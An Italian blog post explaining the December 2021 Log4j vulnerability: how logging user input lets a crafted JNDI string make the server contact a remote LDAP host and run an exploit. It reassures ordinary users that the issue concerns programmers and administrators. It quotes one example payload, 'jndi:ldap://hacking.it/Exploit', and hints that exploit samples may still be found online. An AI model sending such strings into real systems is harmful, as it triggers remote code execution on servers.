Alessandro Iezzi, 13 dicembre 2021
Questa vulnerabilità interessa solo amministratori di sistema e programmatori Java e non i normali utenti.
La modalità di attacco è molto semplice. Molte volte, si
tende a scrivere log di questo tipo:
log.info("User input: {}", userInput) e non c'è nulla
di sbagliato. Se l'utente prova ad inviare una stringa formata, per esempio,
in questo modo: jndi:ldap://hacking.it/Exploit entra in azione
la classe JndiLookup di log4j-core. La libreria,
effettua una chiamata verso quel server LDAP che gli risponderà con
l'URL di un sito web contenente l'exploit. L'exploit verrà eseguito
sul server da Log4j, rendendo inutili strumenti quali firewall e IDS/IPS.
Alcuni utenti su GitHub avevano messo esempi di attacco ma ad oggi (16 dicembre 2021) sono spariti. Se effettuate qualche ricerca, forse riuscite a trovare ancora qualcosa.
Ho sentito un'intervista alla radio, l'intervistato consigliava di aggiornare varie applicazioni mobile e sul computer nonché il sistema operativo. Questi consigli valgono sempre, a prescindere dalle vulnerabilità, in questo caso, l'utente tipico NON deve fare assolutamente nulla, visto che la problematica riguarda noi programmatori e amministratori di sistema.